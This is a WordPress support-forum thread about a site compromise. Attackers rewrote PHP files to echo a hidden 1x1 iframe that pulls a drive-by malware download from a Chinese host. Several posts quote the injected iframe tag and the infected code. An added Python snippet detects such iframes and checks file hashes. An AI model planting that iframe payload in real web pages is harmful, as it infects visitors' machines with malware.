WordPress.org

Files in wp-includes keep changing (18 posts)

  1. coalminecanary
    Member
    Posted 6 years ago #

    Twice now, I have gone to my WordPress install and found that it is throwing PHP errors. I only installed this on the 27th of April, and now on the 3rd day I'm having this happen for a second time.

    My host assures me there was no activity on their server that could have corrupted these files.

    All of the files in wp-includes appear to have new timestamps when this happens, but all other files on the server are fine. If I re-upload the original files from the release package, everything works again.

    For now I have left it in error state at http://www.amykenny.ca in case you want to see the errors.

    Is there anything within WP that could be trying to write info into these files? I'd suspect hacking, except there have been no problems with any other files ever on my server, just this one directory over the last 2 days...

    Thanks!

  2. whooami
    Member
    Posted 6 years ago #

    All of the files in wp-includes appear to have new timestamps when this happens ...

    Is there anything within wp that could be trying to write info into these files?

    No.

    Did you look at the source of that page?

    You might want to. See that iframe?

    <iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>?>

  3. hemasunder
    Member
    Posted 6 years ago #

    <iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>?>

    This is the problem; what is the solution for that?

  4. coalminecanary
    Member
    Posted 6 years ago #

    Interesting.

    So on my webserver, the end of classes.php looks like this:

    function send() {
    		header('Content-Type: text/xml');
    		echo "<?xml version='1.0' standalone='yes'
    echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';
    ?>		foreach ( $this->responses as $response )
    			echo $response;
    		echo '</wp_ajax>';
    		die();
    	}
    }
    
    ?>
    ?>
    ?>

    And my local copy is:

    function send() {
    		header('Content-Type: text/xml');
    		echo "<?xml version='1.0' standalone='yes'?><wp_ajax>";
    		foreach ( $this->responses as $response )
    			echo $response;
    		echo '</wp_ajax>';
    		die();
    	}
    }
    
    ?>

    So, is there something in WP that could allow external access to the wp-includes folder? This definitely appears to be bot-like... search and replace of header text...

    I will check with ISP as well.

    Thanks!

  5. dondakaya
    Member
    Posted 6 years ago #

    My website's PHP files were also modified to include this line on 29 Apr 08 at 22:55 pm (GoDaddy server time). So it's not only a problem with WordPress. I think this is a new kind of virus spreading around.

    If you observe it, it adds the link to the last line of the first PHP block it encounters.
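
Two defender-side checks for what posts 4 and 5 describe (a hidden 1x1 iframe echoed after the first PHP block, and wp-includes files that no longer match the release package), added here as an example; this is not code from the thread or from WordPress, and the sample text and the example.invalid host are constructed stand-ins.

```python
import hashlib
import os
import re

# Any <iframe ...> opening tag; attributes are inspected separately so order does not matter.
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)

def _attr(tag, name):
    """Value of one attribute in a single tag (quoted or bare), or None."""
    m = re.search(rf"""\b{name}\s*=\s*(?:["']([^"']*)["']|([^\s>]+))""", tag, re.IGNORECASE)
    return (m.group(1) or m.group(2)) if m else None

def find_hidden_iframes(text):
    """Return (line_number, src) for each 1x1 iframe hidden via CSS, the shape
    of the tag the thread shows being injected into PHP and HTML files."""
    hits = []
    for m in IFRAME_TAG.finditer(text):
        tag = m.group(0)
        style = re.sub(r"\s", "", _attr(tag, "style") or "").lower()
        tiny = _attr(tag, "width") == "1" and _attr(tag, "height") == "1"
        hidden = "visibility:hidden" in style or "display:none" in style
        if tiny and hidden:
            hits.append((text.count("\n", 0, m.start()) + 1, _attr(tag, "src")))
    return hits

def hash_tree(root, exts=(".php", ".html")):
    """Map relative path -> sha256 hex digest for every PHP/HTML file under root."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as f:
                    digests[os.path.relpath(path, root)] = hashlib.sha256(f.read()).hexdigest()
    return digests

def compare_trees(live, clean):
    """Relative paths whose live digest differs from the clean release copy,
    plus files present live that the clean copy does not contain at all."""
    return sorted(rel for rel, digest in live.items() if clean.get(rel) != digest)

# Constructed sample modelled on the infected classes.php excerpt in the thread;
# the iframe host is a placeholder, not a real site.
SAMPLE_INFECTED = (
    "<?php\nheader('Content-Type: text/xml');\n"
    "echo '<iframe src=\"http://example.invalid/ind.php\" width=\"1\" height=\"1\" "
    "alt=\"x\" style=\"visibility:hidden;position:absolute\"></iframe>';\n"
    "?>\n"
)
```

Run hash_tree over the live wp-includes and over the same directory unpacked from the matching release archive; compare_trees then lists exactly which files to re-upload, and find_hidden_iframes pinpoints the injected line in any file it flags.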

  6. dondakaya
    Member
    Posted 6 years ago #

    coalmine > At first we can consider this a hack only on GoDaddy servers.

    hemasunder > Just replace the files. Right now that is the only solution I can see.

  7. coalminecanary
    Member
    Posted 6 years ago #

    For the record, my host is DreamHost.

    Was this happening on all of your PHP files? Or just certain directories? Just WordPress files?

  8. dondakaya
    Member
    Posted 6 years ago #

    It was only for certain dirs and files, not all. Dirs like scripts, core; files like contact.php, search.php, login.php. FYI, I don't have any WordPress files in my website. I am posting here because of the http://apartment-mall.cn/ind.php problem.

  9. coalminecanary
    Member
    Posted 6 years ago #

    This is only happening to my WordPress includes directory. I have lots of other PHP files on the server under the same FTP login. wp-includes only has write access by owner, I double checked that...

  10. sanmarco
    Member
    Posted 6 years ago #

    Hi, I had the same problem, the hack by apartment-mall. It's only affecting all PHP and all HTML files. I deleted them one time, then they got rewritten! The safe way to do it: don't open your website where the hack messed everything up, because it will put a load.exe on your desktop. If you then try to delete all PHP and HTML files, this application rewrites them. I had this problem. Went to another PC, used the FTP program to delete the PHP and HTML files or just overwrite them with the clean ones from my backup. Now it's OK. Make sure you check all your directories!! Also maybe check your chmod status; if it is on 777, that may be the loophole where the hack goes in and messes everything up. My chmod was on 777.

    Yes, it's always only writing the iframe thing below in the last row!
    sanmarco

  11. sanmarco
    Member
    Posted 6 years ago #

    I forgot, it was not only attacking my WordPress files, also my Textpattern files, which I use now mostly. But I guess the WordPress files I still had on my host were the entrance for the hack, because I checked in the Textpattern forums and there were no postings about this hack yet.

  12. coalminecanary
    Member
    Posted 6 years ago #

    So wait, this is a program ON the webserver that caused it for you?

    Or a program on the computer with which you FTP into the webserver?

    Thanks!

  13. sanmarco
    Member
    Posted 6 years ago #

    I guess it's a program on the computer. It is a program downloaded when it links and opens this apartment-mall website. I tried two PCs in an internet cafe; both times it downloaded a so-called "load.exe" from apartment-mall.cn onto the desktop. This happened in the background while the browser tried to open my website. At the third PC I then avoided opening my infected website. It worked successfully when I deleted the files with my FTP program. I used an FTP program running from a memory stick. But I also deleted all the WordPress tables in my database to make sure there is nothing stored there too, because I was not sure. They were useless anyway, as I use Textpattern now.
    My guess is that this load.exe "knows" when you enter your webspace via FTP. As soon as you delete or rewrite the files, it rewrites them again.
    I was also not able to delete this load.exe from the desktop or drag it into the recycle bin. Hence my theory that it's the program ON the computer. Hope this info can help you guys.

    Sanmarco

  14. dondakaya
    Member
    Posted 6 years ago #

    Upon testing the infected scripts on IE7, the ind.php actually tries to install an ActiveX control in IE, disguised under the name of Microsoft.

    If you have Avast antivirus, you can block the website, so the browser will not download anything from that website. Later, replace the files via FTP. I think this is a new virus, so it will take some time to write antivirus for it.

  15. dondakaya
    Member
    Posted 6 years ago #

    This link might be useful - http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml

    The article is big, but read it to understand it. It says that it's the MPack server that does all this.

  16. coalminecanary
    Member
    Posted 6 years ago #

    Hm

    So what I am wondering is HOW these PHP files are getting written over?

    When I replace them with FTP, the site works for some time.

    Then later on, the site is broken and all of the wp-includes files have been edited by whatever script.

    My site is hosted remotely by DreamHost on a Unix-based server. My guess is that the bot is accessing these files through some sort of exploit.

    WordPress is the ONLY thing installed on this website!

  17. sanmarco
    Member
    Posted 6 years ago #

    #coalmine
    OK, maybe check this:
    go into your database and see if there are two tables called something like zenmas or similar (I don't remember it exactly). I had two of these tables in my database; never ever did any of my PHP scripts install them there. I forgot to mention that yesterday. If you see them, delete them. Maybe the hack writes something into the database...

    #dondakaya
    Yes, this load.exe is that ActiveX control. But interesting that it only downloads it with IE7.

  18. coalminecanary
    Member
    Posted 6 years ago #

    OK does any of this look suspect in the database?

    Table                   Records   Size        Overhead
    wp_comments                   1   6.2 KiB     -
    wp_links                      7   4.5 KiB     -
    wp_options                  149   485.0 KiB   608 B
    wp_postmeta                  42   9.5 KiB     96 B
    wp_posts                     21   31.8 KiB    -
    wp_terms                     13   5.5 KiB     -
    wp_term_relationships        27   3.6 KiB     -
    wp_term_taxonomy             13   3.6 KiB     -
    wp_usermeta                  15   8.3 KiB     -
    wp_users                      2   4.2 KiB     -
    wp_yapbimage                 16   4.0 KiB     -
    11 table(s)        Sum      306   566.3 KiB   704 B

    Also, where does WP store the database user info? I should verify that it is not world-readable, right? After install I was not directed to change any file permissions, so it's possible that the DB login is in a world-readable file...

    This is where I will start, as well as changing passwords, and see what happens.

    Thanks!

Topic Closed

This topic has been closed to new replies.